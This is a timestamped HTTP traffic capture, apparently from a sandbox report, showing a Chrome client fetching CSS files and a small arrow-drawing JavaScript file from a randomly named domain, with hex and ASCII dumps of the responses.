2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 69 65 37 20 2e 62 74 6e 55 73 65 72 41 63 74 69 6f 6e 4d 65 6e 75 20 61 20 73 70 61 6e 7b 68 65 69 67 68 74 3a 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 32 38 70 78 20 38 70 78 7d 20 20 2e 69 65 37 20 23 70 72 6f 66 69 6c 65 4d 65 6e 75 20 2e 62 74 6e 55 73 65 72 41 63 74 69 6f 6e 4d 65 6e 75 20 61 20 73 70 61 6e 7b 77 69 64 74 68 3a 31 37 35 70 78 3b 70 61 64 64 69 6e 67 3a 31 70 78 20 32 38 70 78 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 32 70 78 3b 68 65 69 67 68 74 3a 32 35 70 78 7d 20 20 2e 6c 61 6e 67 75 61 67 65 2d 64 65 20 2e 62 74 6e 55 73 65 72 41 63 74 69 6f 6e 4d 65 6e 75 20 61 20 73 70 61 6e 2e 62 74 6e 47 72 65 65 6e 2c 2e 6c 61 6e 67 75 61 Data Ascii: ie7 .btnUserActionMenu a span{height:12px;text-align:center;padding:4px 28px 8px} .ie7 #profileMenu .btnUserActionMenu a span{width:175px;padding:1px 28px 0 !important;line-height:12px;height:25px} .language-de .btnUserActionMenu a span.btnGreen,.langua
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 20 2e 67 72 61 64 69 65 6e 74 2d 76 69 64 65 6f 2d 62 75 74 74 6f 6e 73 2e 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 61 33 61 33 61 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 73 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 33 32 33 32 33 32 20 30 2c 23 31 65 31 65 31 65 20 31 30 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 33 32 33 32 33 32 20 30 2c 23 31 65 31 65 31 65 20 31 30 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6f 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 33 32 33 32 33 32 20 30 2c 23 31 65 31 65 31 65 20 31 30 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e Data Ascii: .gradient-video-buttons.active{background:#3a3a3a;background-image:-ms-linear-gradient(top,#323232 0,#1e1e1e 100%);background-image:-moz-linear-gradient(top,#323232 0,#1e1e1e 100%);background-image:-o-linear-gradient(top,#323232 0,#1e1e1e 100%);backgroun
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 31 39 70 78 3b 6d 61 72 67 69 6e 3a 2d 31 34 70 78 20 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 77 69 64 74 68 3a 35 35 70 78 7d 20 20 2e 73 68 61 72 65 2d 62 6c 6f 63 6b 2d 72 75 20 6c 61 62 65 6c 2c 2e 73 68 61 72 65 2d 62 6c 6f 63 6b 2d 70 6c 20 6c 61 62 65 6c 2c 2e 73 68 61 72 65 2d 62 6c 6f 63 6b 2d 69 74 20 6c 61 62 65 6c 2c 2e 73 68 61 72 65 2d 62 6c 6f 63 6b 2d 65 73 20 6c 61 62 65 6c 2c 2e 73 68 61 72 65 2d 62 6c 6f 63 6b 2d 64 65 20 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 34 31 70 78 3b 6d 61 72 67 69 6e 3a 2d 31 34 70 78 20 2d 32 35 70 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 77 69 64 74 68 3a 35 Data Ascii: play:block;padding:10px 19px;margin:-14px 0;cursor:pointer;width:55px} .share-block-ru label,.share-block-pl label,.share-block-it label,.share-block-es label,.share-block-de label{display:block;padding:10px 41px;margin:-14px -25px;cursor:pointer;width:5
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 38 35 70 78 20 2d 31 33 37 70 78 7d 20 20 2e 66 61 76 6f 72 69 74 65 2d 6d 61 69 6e 2d 69 63 6f 6e 2c 2e 66 61 76 6f 72 69 74 65 2d 6d 61 69 6e 2d 69 63 6f 6e 2d 73 65 6c 65 63 74 65 64 7b 77 69 64 74 68 3a 33 31 70 78 3b 68 65 69 67 68 74 3a 32 39 70 78 3b 6d 61 72 67 69 6e 3a 31 31 70 78 20 36 70 78 7d 20 20 2e 66 61 76 6f 72 69 74 65 2d 6d 61 69 6e 2d 69 63 6f 6e 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 38 34 70 78 20 2d 31 36 37 70 78 7d 20 20 2e 66 61 76 6f 72 69 74 65 2d 6d 61 69 6e 2d 69 63 6f 6e 2d 73 65 6c 65 63 74 65 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 38 34 70 78 20 2d 31 36 37 70 78 7d 20 20 64 69 76 2e 62 74 6e 2d 66 Data Ascii: ground-position:-85px -137px} .favorite-main-icon,.favorite-main-icon-selected{width:31px;height:29px;margin:11px 6px} .favorite-main-icon:hover{background-position:-84px -167px} .favorite-main-icon-selected{background-position:-84px -167px} div.btn-f
2025-10-17 06:51:40 UTC	559	OUT	GET /css/fix.css HTTP/1.1 Host: xpoalswwkjddsljsy.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://xpoalswwkjddsljsy.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-10-17 06:51:40 UTC	307	IN	HTTP/1.1 200 OK Date: Fri, 17 Oct 2025 06:51:40 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 03 Oct 2025 14:29:18 GMT ETag: "3f2-64041ed5105a4" Accept-Ranges: bytes Content-Length: 1010 Vary: Accept-Encoding Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/css

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:40 UTC	562	OUT	GET /css/layout.css HTTP/1.1 Host: xpoalswwkjddsljsy.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://xpoalswwkjddsljsy.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-10-17 06:51:40 UTC	309	IN	HTTP/1.1 200 OK Date: Fri, 17 Oct 2025 06:51:40 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 03 Oct 2025 14:29:19 GMT ETag: "1743-64041ed56d208" Accept-Ranges: bytes Content-Length: 5955 Vary: Accept-Encoding Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/css
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 2e 62 75 74 74 6f 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 6e 6f 4c 69 6e 6b 42 74 6e 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 47 72 65 79 42 6f 74 74 6f 6d 43 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 20 30 2c 72 67 62 61 28 33 2c 33 2c 33 2c 30 29 20 31 30 25 2c 72 67 62 61 28 31 33 2c 31 33 2c 31 33 2c 30 2e Data Ascii: .button{display:inline-block;text-decoration:none;border:0;cursor:pointer;vertical-align:top;text-align:center}.noLinkBtn{cursor:default !important}.GreyBottomContainer{background:-moz-linear-gradient(top,rgba(0,0,0,0) 0,rgba(3,3,3,0) 10%,rgba(13,13,13,0.
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 23 33 32 33 32 33 32 20 30 2c 23 31 63 31 63 31 63 20 31 30 30 25 29 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 73 74 72 3d 23 33 32 33 32 33 32 2c 65 6e 64 43 6f 6c 6f 72 73 74 72 3d 23 31 63 31 63 31 63 2c 47 72 61 64 69 65 6e 74 54 79 70 65 3d 30 29 7d 2e 61 72 72 6f 77 7b 63 6f 6e 74 65 6e 74 3a 27 27 3b 77 69 64 74 68 3a 30 3b 68 65 69 67 68 74 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 2e 65 6c 6c 69 70 73 69 73 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c Data Ascii: ound:linear-gradient(to bottom,#323232 0,#1c1c1c 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=#323232,endColorstr=#1c1c1c,GradientType=0)}.arrow{content:'';width:0;height:0;font-size:0}.ellipsis{white-space:nowrap;text-overflow:el
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 35 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 7d 2e 66 75 6c 6c 2d 72 6f 77 2d 74 68 75 6d 62 73 2d 77 69 64 74 68 2d 73 69 64 65 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 75 6c 6c 2d 72 6f 77 2d 74 68 75 6d 62 73 2d 77 69 64 74 68 2d 73 69 64 65 2e 76 69 64 65 6f 73 20 6c 69 2e 76 69 64 65 6f 42 6f 78 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 3b 77 69 64 74 68 3a 33 32 2e 34 25 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 33 35 30 70 78 29 7b 2e 66 75 6c 6c 2d 72 6f 77 2d 74 68 75 6d 62 73 2d 77 69 64 74 68 2d 73 69 64 65 2e 76 69 64 65 6f 73 20 6c 69 2e 76 69 64 65 6f 42 6f 78 7b 77 69 64 74 68 3a 32 34 2e 37 25 7d 7d 2e 66 75 Data Ascii: 5){display:none}}.full-row-thumbs-width-side{margin-left:5px;width:100%}.full-row-thumbs-width-side.videos li.videoBox{margin-bottom:15px;width:32.4%}@media only screen and (min-width:1350px){.full-row-thumbs-width-side.videos li.videoBox{width:24.7%}}.fu
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 31 33 35 30 70 78 29 7b 2e 73 65 61 72 63 68 2d 76 69 64 65 6f 2d 74 68 75 6d 62 73 2e 76 69 64 65 6f 73 2e 72 6f 77 2d 35 2d 74 68 75 6d 62 73 20 6c 69 7b 77 69 64 74 68 3a 31 39 2e 36 25 7d 7d 2e 73 65 61 72 63 68 2d 76 69 64 65 6f 2d 74 68 75 6d 62 73 2e 76 69 64 65 6f 73 2e 72 6f 77 2d 32 2d 74 68 75 6d 62 73 20 6c 69 2e 76 69 64 65 6f 42 6f 78 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 3b 77 69 64 74 68 3a 34 39 2e 31 25 7d 2e 73 65 61 72 63 68 2d 76 69 64 65 6f 2d 74 68 75 6d 62 73 2e 76 69 64 65 6f 73 2e 72 6f 77 2d 32 2d 74 68 75 6d 62 73 20 6c 69 2e 76 69 64 65 6f 42 6f 78 20 2e 77 72 61 70 7b 77 69 64 74 68 3a 31 35 30 70 78 3b 68 65 69 67 68 74 3a 61 75 74 6f 7d 2e 73 65 61 72 63 68 2d 76 69 64 65 6f 2d 74 68 75 6d 62 73 2e 76 69 64 65 6f 73 Data Ascii: 1350px){.search-video-thumbs.videos.row-5-thumbs li{width:19.6%}}.search-video-thumbs.videos.row-2-thumbs li.videoBox{margin-right:0;width:49.1%}.search-video-thumbs.videos.row-2-thumbs li.videoBox .wrap{width:150px;height:auto}.search-video-thumbs.videos
2025-10-17 06:51:40 UTC	115	IN	Data Raw: 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 33 34 39 70 78 29 7b 2e 72 65 63 6f 6d 6d 65 6e 64 65 64 43 6f 6e 74 61 69 6e 65 72 4c 6f 73 65 4f 6e 65 2e 76 69 64 65 6f 73 20 6c 69 2e 76 69 64 65 6f 42 6f 78 2b 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 7d Data Ascii: media only screen and (max-width:1349px){.recommendedContainerLoseOne.videos li.videoBox+:last-child{display:none}}
2025-10-17 06:51:40 UTC	564	OUT	GET /css/pb_block.css HTTP/1.1 Host: xpoalswwkjddsljsy.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://xpoalswwkjddsljsy.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-10-17 06:51:40 UTC	307	IN	HTTP/1.1 200 OK Date: Fri, 17 Oct 2025 06:51:40 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 03 Oct 2025 14:29:19 GMT ETag: "4c4-64041ed5923ca" Accept-Ranges: bytes Content-Length: 1220 Vary: Accept-Encoding Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/css
2025-10-17 06:51:40 UTC	1220	IN	Data Raw: 40 63 68 61 72 73 65 74 20 22 75 74 66 2d 38 22 3b 23 70 62 5f 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 35 30 25 3b 74 6f 70 3a 35 30 25 3b 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 32 39 35 70 78 3b 6d 61 72 67 69 6e 3a 2d 31 36 36 70 78 20 30 20 30 20 2d 31 36 32 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 7d 23 70 62 5f 62 6c 6f 63 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 35 30 25 3b 74 6f 70 3a 35 30 25 3b 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 32 39 35 70 78 3b 6d 61 72 67 69 6e 3a 2d 31 36 36 70 78 Data Ascii: @charset "utf-8";#pb_template{display:none;position:absolute;left:50%;top:50%;width:320px;height:295px;margin:-166px 0 0 -162px;z-index:10}#pb_block{background-color:#000;color:#fff;position:absolute;left:50%;top:50%;width:320px;height:295px;margin:-166px
2025-10-17 06:51:41 UTC	544	OUT	GET /js/dist.js HTTP/1.1 Host: xpoalswwkjddsljsy.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://xpoalswwkjddsljsy.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-10-17 06:51:41 UTC	315	IN	HTTP/1.1 200 OK Date: Fri, 17 Oct 2025 06:51:41 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 03 Oct 2025 14:29:17 GMT ETag: "118b-64041ed441519" Accept-Ranges: bytes Content-Length: 4491 Vary: Accept-Encoding Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/javascript
2025-10-17 06:51:41 UTC	1460	IN	Data Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 4d 61 74 68 2e 50 49 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 74 2c 6e 2c 72 2c 65 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 21 31 29 3b 76 61 72 20 6f 3d 6e 5b 30 5d 2c 61 3d 6e 5b 31 5d 2c 69 3d 72 5b 30 5d 2c 63 3d 72 5b 31 5d 2c 73 3d 69 2b 28 74 2d 6f 29 2f 28 61 2d 6f 29 2a 28 63 2d 69 29 3b 69 66 28 21 30 3d 3d 3d 65 29 69 66 28 69 3c 63 29 7b 69 66 28 73 3c 69 29 72 65 74 75 72 6e 20 69 3b 69 66 28 73 3e 63 29 72 65 74 75 72 6e 20 63 7d 65 6c 73 65 7b 69 66 28 73 3e 69 29 72 65 74 75 72 6e 20 69 3b 69 66 28 73 3c 63 29 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 20 73 7d 66 75 6e 63 74 69 6f 6e 20 72 28 74 2c 6e 2c 72 2c 65 2c 6f 29 7b 76 61 72 20 61 3d 4d 61 74 68 2e Data Ascii: (()=>{"use strict";var t=Math.PI;function n(t,n,r,e){void 0===e&&(e=!1);var o=n[0],a=n[1],i=r[0],c=r[1],s=i+(t-o)/(a-o)*(c-i);if(!0===e)if(i<c){if(s<i)return i;if(s>c)return c}else{if(s>i)return i;if(s<c)return c}return s}function r(t,n,r,e,o){var a=Math.
2025-10-17 06:51:41 UTC	1460	IN	Data Raw: 4a 2c 4b 2c 75 2c 66 29 2c 6f 74 3d 69 28 57 2c 5a 2c 74 74 2c 6e 74 2c 2e 35 29 2c 61 74 3d 6f 74 5b 30 5d 2c 69 74 3d 6f 74 5b 31 5d 2c 63 74 3d 69 28 57 2c 5a 2c 74 74 2c 6e 74 2c 2e 35 2d 24 29 2c 73 74 3d 63 74 5b 30 5d 2c 75 74 3d 63 74 5b 31 5d 2c 66 74 3d 72 28 73 74 2c 75 74 2c 61 74 2c 69 74 2c 4d 61 74 68 2e 50 49 2f 32 2a 55 29 2c 6c 74 3d 69 28 4a 2c 4b 2c 73 74 3d 66 74 5b 30 5d 2c 75 74 3d 66 74 5b 31 5d 2c 2e 35 29 3b 72 65 74 75 72 6e 5b 57 2c 5a 2c 6c 74 5b 30 5d 2c 6c 74 5b 31 5d 2c 74 74 2c 6e 74 2c 65 74 2c 72 74 2c 53 5d 7d 4d 61 74 68 2e 50 49 3b 66 75 6e 63 74 69 6f 6e 20 75 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 29 72 65 74 75 72 6e 20 74 Data Ascii: J,K,u,f),ot=i(W,Z,tt,nt,.5),at=ot[0],it=ot[1],ct=i(W,Z,tt,nt,.5-$),st=ct[0],ut=ct[1],ft=r(st,ut,at,it,Math.PI/2*U),lt=i(J,K,st=ft[0],ut=ft[1],.5);return[W,Z,lt[0],lt[1],tt,nt,et,rt,S]}Math.PI;function u(t,n){return function(t){if(Array.isArray(t))return t
2025-10-17 06:51:41 UTC	1460	IN	Data Raw: 74 50 61 72 65 6e 74 29 7b 64 6f 7b 6e 2b 3d 74 2e 6f 66 66 73 65 74 4c 65 66 74 2c 72 2b 3d 74 2e 6f 66 66 73 65 74 54 6f 70 7d 77 68 69 6c 65 28 74 3d 74 2e 6f 66 66 73 65 74 50 61 72 65 6e 74 29 3b 72 65 74 75 72 6e 7b 58 3a 6e 2c 59 3a 72 7d 7d 7d 28 72 29 3b 69 66 28 6f 29 7b 74 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 6f 2e 58 2b 22 70 78 22 2c 6e 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 6f 2e 58 2b 22 70 78 22 3b 76 61 72 20 61 3d 7b 78 3a 6f 2e 58 2c 79 3a 6f 2e 59 2b 72 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 2f 32 7d 2c 69 3d 7b 78 3a 31 33 30 2c 79 3a 65 2d 35 30 7d 2c 63 3d 75 28 73 28 61 2e 78 2c 61 2e 79 2c 69 2e 78 2c 69 2e 79 2c 7b 62 6f 77 3a 2e 33 7d 29 2c 39 29 2c 66 3d 63 5b 30 5d 2c 6c 3d 63 5b 31 5d 2c 68 3d 63 5b 32 5d 2c 64 3d 63 5b 33 Data Ascii: tParent){do{n+=t.offsetLeft,r+=t.offsetTop}while(t=t.offsetParent);return{X:n,Y:r}}}(r);if(o){t.style.width=o.X+"px",n.style.width=o.X+"px";var a={x:o.X,y:o.Y+r.clientHeight/2},i={x:130,y:e-50},c=u(s(a.x,a.y,i.x,i.y,{bow:.3}),9),f=c[0],l=c[1],h=c[2],d=c[3
2025-10-17 06:51:41 UTC	111	IN	Data Raw: 61 74 68 2e 6d 69 6e 28 2d 39 30 2c 6b 29 2c 27 29 22 5c 6e 20 20 20 20 20 20 2f 3e 5c 6e 20 20 20 20 3c 2f 73 76 67 3e 27 29 7d 7d 2c 72 65 73 69 7a 65 41 72 72 6f 77 73 28 29 2c 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 72 65 73 69 7a 65 22 2c 72 65 73 69 7a 65 41 72 72 6f 77 73 29 7d 29 28 29 3b Data Ascii: ath.min(-90,k),')"\n />\n </svg>')}},resizeArrows(),window.addEventListener("resize",resizeArrows)})();

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:40 UTC	572	OUT	GET /css/widgets-comments.css HTTP/1.1 Host: xpoalswwkjddsljsy.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://xpoalswwkjddsljsy.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-10-17 06:51:40 UTC	309	IN	HTTP/1.1 200 OK Date: Fri, 17 Oct 2025 06:51:40 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 03 Oct 2025 14:29:19 GMT ETag: "1f8c-64041ed6028b0" Accept-Ranges: bytes Content-Length: 8076 Vary: Accept-Encoding Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/css
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 2e 62 75 74 74 6f 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 6e 6f 4c 69 6e 6b 42 74 6e 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 47 72 65 79 42 6f 74 74 6f 6d 43 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 20 30 2c 72 67 62 61 28 33 2c 33 2c 33 2c 30 29 20 31 30 25 2c 72 67 62 61 28 31 33 2c 31 33 2c 31 33 2c 30 2e Data Ascii: .button{display:inline-block;text-decoration:none;border:0;cursor:pointer;vertical-align:top;text-align:center}.noLinkBtn{cursor:default !important}.GreyBottomContainer{background:-moz-linear-gradient(top,rgba(0,0,0,0) 0,rgba(3,3,3,0) 10%,rgba(13,13,13,0.
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 23 33 32 33 32 33 32 20 30 2c 23 31 63 31 63 31 63 20 31 30 30 25 29 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 73 74 72 3d 23 33 32 33 32 33 32 2c 65 6e 64 43 6f 6c 6f 72 73 74 72 3d 23 31 63 31 63 31 63 2c 47 72 61 64 69 65 6e 74 54 79 70 65 3d 30 29 7d 2e 61 72 72 6f 77 7b 63 6f 6e 74 65 6e 74 3a 27 27 3b 77 69 64 74 68 3a 30 3b 68 65 69 67 68 74 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 2e 65 6c 6c 69 70 73 69 73 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c Data Ascii: ound:linear-gradient(to bottom,#323232 0,#1c1c1c 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=#323232,endColorstr=#1c1c1c,GradientType=0)}.arrow{content:'';width:0;height:0;font-size:0}.ellipsis{white-space:nowrap;text-overflow:el
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 31 35 70 78 3b 68 65 69 67 68 74 3a 31 35 70 78 7d 20 20 23 63 6d 74 57 72 61 70 70 65 72 20 2e 63 6f 6d 6d 65 6e 74 42 74 6e 2e 72 65 70 6f 72 74 42 74 6e 20 69 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 33 70 78 20 2d 31 33 31 70 78 7d 20 20 23 63 6d 74 57 72 61 70 70 65 72 20 2e 63 6f 6d 6d 65 6e 74 42 74 6e 2e 72 65 70 6c 79 20 69 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2e 2e 2f 69 6d 61 67 65 73 2f 65 6d 70 74 79 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 2d 32 34 70 78 20 30 3b 77 69 64 74 68 3a 31 33 70 78 7d 20 20 23 63 6d 74 57 72 61 70 70 65 72 20 2e 63 6f 6d 6d 65 6e 74 42 74 6e 2e 73 68 6f 77 50 61 72 65 6e 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 30 31 30 31 30 3b 62 6f 72 64 Data Ascii: 15px;height:15px} #cmtWrapper .commentBtn.reportBtn i{background-position:-3px -131px} #cmtWrapper .commentBtn.reply i{background:url('../images/empty.png') no-repeat -24px 0;width:13px} #cmtWrapper 